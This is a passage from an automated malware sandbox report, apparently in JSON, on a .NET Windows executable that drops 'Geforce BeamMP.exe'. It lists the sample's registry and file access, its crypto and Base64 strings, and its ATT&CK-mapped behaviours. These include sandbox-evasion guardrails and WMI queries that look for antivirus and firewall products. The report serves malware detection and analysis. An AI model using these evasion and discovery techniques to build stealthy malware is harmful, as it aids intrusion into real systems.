\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" queries basic process information of the \"C:\\Windows\\System32\\cryptsp.dll\" (UID: 5912)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"9A301B34BE9EBDA00F6C1930C4B56A054683B44A2C59D0017A7A4B2BF39C0500\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"CLRLOADLOGDIR\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"USELEGACYV2RUNTIMEACTIVATIONPOLICYDEFAULTVALUE\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"ONLYUSELATESTCLR\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"NOCLIENTCHECKS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe.config\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Client\\\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.INI\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe.Local\\\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9A301B34BE9EBDA00F6C1930C4B56A054683B44A2C59D0017A7A4B2BF39C0500.EXE.CONFIG\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\FUSION.LOCALGAC\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\CLIENT\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9A301B34BE9EBDA00F6C1930C4B56A054683B44A2C59D0017A7A4B2BF39C0500.INI\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC\\PUBLISHERPOLICY.TME\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9A301B34BE9EBDA00F6C1930C4B56A054683B44A2C59D0017A7A4B2BF39C0500.EXE.LOCAL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Geforce BeamMP.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: 00000000-00005912]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Tries to sleep for a long time (more than two minutes)\n Matched sigs: Found a reference to an external IP address lookup service\n Matched sigs: Able to identify virtual environment by using API string", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"PbeSha1_RC2_40\" (Indicator: \"RC2\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"RC2_CBC_40\" (Indicator: \"RC2\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"SRTP_NULL_HMAC_SHA1_80\" (Indicator: \"HMAC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"SRTP_AES128_CM_HMAC_SHA1_80\" (Indicator: \"HMAC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"HMAC_SHA1\" (Indicator: \"HMAC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"EncryptionECDsaWithSha1\" (Indicator: \"ECDsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TRAILER_SHA512\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"ecka_eg_X963kdf_SHA512\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"sphincs256_with_SHA512\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"xmss_with_SHA512\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"xmss_mt_with_SHA512\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"ecdsa_plain_SHA512\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"EncryptionECDsaWithSha512\" (Indicator: \"ECDsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"SRTP_NULL_HMAC_SHA1_32\" (Indicator: \"HMAC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"SRTP_AES128_CM_HMAC_SHA1_32\" (Indicator: \"HMAC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"Aes192\" (Indicator: \"Aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"ECDsaWithSha2\" (Indicator: \"ECDsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TRAILER_SHA512_224\" (Indicator: \"SHA512\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"EncryptionECDsaWithSha224\" (Indicator: \"ECDsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"RC2_64\" (Indicator: \"RC2\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to \"TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/3\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/3\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadResource with parameter {'hModule': '1995243520', 'hResInfo': '5899760'}\" (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-513", "type": 2, "relevance": 1, "name": "References to WMI query strings used for process discovery", "description": "Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"471596010,5984,3024,,RtlGetVersion,NTDLL.dll,\"252:02:48.598\",RX=0,PX=0\" (Indicator: \"GetVersion\"; Source: \"00000000-00005912.00000000.66618.00300000.00000004.mdmp, 00000000-00005912.00000001.68541.00300000.00000004.mdmp, 00000000-00005912.00000002.70462.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100003879320078f92b00145c4177435c417744fa2b00010000009401300001000000f8f82b00935c427740834977d4a041774db16d7744fa2b00010000000100000058d0320000000000c8f82b00f8f82b0064f92b0095e13d774d4d0700feffffffd4a041771bbe32750000f37500000000 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c00530088383300110000114afa0000f0fa330098393300b1080000aaa8640000200000b0080000580f00000d004200a2000000b1080000a1000000a1080000c9570000000000000000000036a8ffff5c00500000000000b1080000 (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "Org.BouncyCastle.Asn1.Pkcs.PrivateKeyInfo::GetVersionValue(Org.BouncyCastle.Asn1.DerInteger) at 3186fc776c32b580078d6e0da80dcd97-6004ed7-ctor", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"SELECT * FROM Win32_BIOS\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_BaseBoard\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Select * From Win32_ComputerSystem\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_DisplayConfiguration\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM AntivirusProduct\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM FirewallProduct\" (Indicator: \"select * from \"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; Source: 